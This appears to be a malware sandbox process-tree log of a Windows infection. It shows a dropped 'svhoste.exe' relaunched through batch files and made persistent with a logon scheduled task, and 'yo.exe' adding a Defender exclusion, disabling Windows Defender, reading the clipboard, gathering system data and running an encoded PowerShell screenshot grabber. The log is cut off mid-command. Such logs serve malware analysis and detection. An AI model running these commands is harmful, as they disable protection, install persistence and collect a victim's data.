C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3wDHg10x53md.bat" "46⤵PID:112
-
C:\Windows\system32\chcp.comchcp 6500147⤵PID:3304
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost47⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1720
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"47⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4460 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f48⤵
- Scheduled Task/Job: Scheduled Task
PID:2468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FtytWixZ6Xlu.bat" "48⤵PID:3208
-
C:\Windows\system32\chcp.comchcp 6500149⤵PID:4652
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost49⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3668
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"49⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5016 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f50⤵
- Scheduled Task/Job: Scheduled Task
PID:3504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rIiAQhN5cpxq.bat" "50⤵PID:1372
-
C:\Windows\system32\chcp.comchcp 6500151⤵PID:1444
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost51⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2044
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"51⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3660 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f52⤵
- Scheduled Task/Job: Scheduled Task
PID:872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SygsWAJJq857.bat" "52⤵PID:3020
-
C:\Windows\system32\chcp.comchcp 6500153⤵PID:1108
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3568
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"53⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2788 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f54⤵
- Scheduled Task/Job: Scheduled Task
PID:864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TAALbt2nh8Fs.bat" "54⤵PID:2392
-
C:\Windows\system32\chcp.comchcp 6500155⤵PID:4936
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost55⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3008
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"55⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3420 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f56⤵
- Scheduled Task/Job: Scheduled Task
PID:1492
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S0zevSyf3w5I.bat" "56⤵PID:2080
-
C:\Windows\system32\chcp.comchcp 6500157⤵PID:412
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost57⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1588
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"57⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:980 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f58⤵
- Scheduled Task/Job: Scheduled Task
PID:1044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pQCZ0dIK911z.bat" "58⤵PID:4988
-
C:\Windows\system32\chcp.comchcp 6500159⤵PID:836
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost59⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2644
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"59⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1380 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f60⤵
- Scheduled Task/Job: Scheduled Task
PID:2824
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\J9ZVW7ksrphN.bat" "60⤵PID:3328
-
C:\Windows\system32\chcp.comchcp 6500161⤵PID:1568
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost61⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2456
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"61⤵
- Suspicious use of SetWindowsHookEx
PID:3848 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f62⤵
- Scheduled Task/Job: Scheduled Task
PID:4392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\idPLYtgVvNlP.bat" "62⤵PID:2456
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV163⤵PID:3560
-
-
C:\Windows\system32\chcp.comchcp 6500163⤵PID:1700
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost63⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:764
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"63⤵
- Suspicious use of SetWindowsHookEx
PID:2092 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f64⤵
- Scheduled Task/Job: Scheduled Task
PID:2140
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QqDRdO3O2aFV.bat" "64⤵PID:2968
-
C:\Windows\system32\chcp.comchcp 6500165⤵PID:980
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost65⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4756
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"65⤵
- Suspicious use of SetWindowsHookEx
PID:1236 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f66⤵
- Scheduled Task/Job: Scheduled Task
PID:2860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D6KZGdgfXf8M.bat" "66⤵PID:1596
-
C:\Windows\system32\chcp.comchcp 6500167⤵PID:1388
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost67⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2652
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"67⤵
- Suspicious use of SetWindowsHookEx
PID:3816 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f68⤵
- Scheduled Task/Job: Scheduled Task
PID:4196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\exVMumHYxg7E.bat" "68⤵PID:4956
-
C:\Windows\system32\chcp.comchcp 6500169⤵PID:4100
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost69⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1476
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"69⤵
- Suspicious use of SetWindowsHookEx
PID:3660 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f70⤵
- Scheduled Task/Job: Scheduled Task
PID:2260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4vh5SpQdejmO.bat" "70⤵PID:3040
-
C:\Windows\system32\chcp.comchcp 6500171⤵PID:1172
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost71⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1924
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"71⤵
- Suspicious use of SetWindowsHookEx
PID:668 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f72⤵
- Scheduled Task/Job: Scheduled Task
PID:2460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\J94C5IvlhWUv.bat" "72⤵PID:4984
-
C:\Windows\system32\chcp.comchcp 6500173⤵PID:2480
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost73⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3660
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"73⤵
- Suspicious use of SetWindowsHookEx
PID:3856 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f74⤵
- Scheduled Task/Job: Scheduled Task
PID:1188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MUQoFiIw5dWV.bat" "74⤵PID:4884
-
C:\Windows\system32\chcp.comchcp 6500175⤵PID:3528
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost75⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2628
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"75⤵
- Suspicious use of SetWindowsHookEx
PID:1212 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f76⤵
- Scheduled Task/Job: Scheduled Task
PID:1408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OIqHvECgHcA7.bat" "76⤵PID:692
-
C:\Windows\system32\chcp.comchcp 6500177⤵PID:4188
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost77⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1196
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"77⤵
- Suspicious use of SetWindowsHookEx
PID:3308 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f78⤵
- Scheduled Task/Job: Scheduled Task
PID:3048
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WQusntONwhfE.bat" "78⤵PID:4432
-
C:\Windows\system32\chcp.comchcp 6500179⤵PID:4064
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost79⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4892
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"79⤵
- Suspicious use of SetWindowsHookEx
PID:1624 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f80⤵
- Scheduled Task/Job: Scheduled Task
PID:3968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0ZIS0v0eXgLn.bat" "80⤵PID:3708
-
C:\Windows\system32\chcp.comchcp 6500181⤵PID:2480
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost81⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4288
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"81⤵
- Suspicious use of SetWindowsHookEx
PID:2356 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f82⤵
- Scheduled Task/Job: Scheduled Task
PID:4040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mMKlyoyzigYD.bat" "82⤵PID:5076
-
C:\Windows\system32\chcp.comchcp 6500183⤵PID:2564
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost83⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3808
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\downloader.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\Files\yo.exe"C:\Users\Admin\AppData\Local\Temp\Files\yo.exe"2⤵
- Executes dropped EXE
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\Files\yo.exe"C:\Users\Admin\AppData\Local\Temp\Files\yo.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\yo.exe'"4⤵PID:868
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\yo.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:2776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2828
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2172
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:1548
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:2788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1812
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2492
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:3812
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:2044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:1872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkA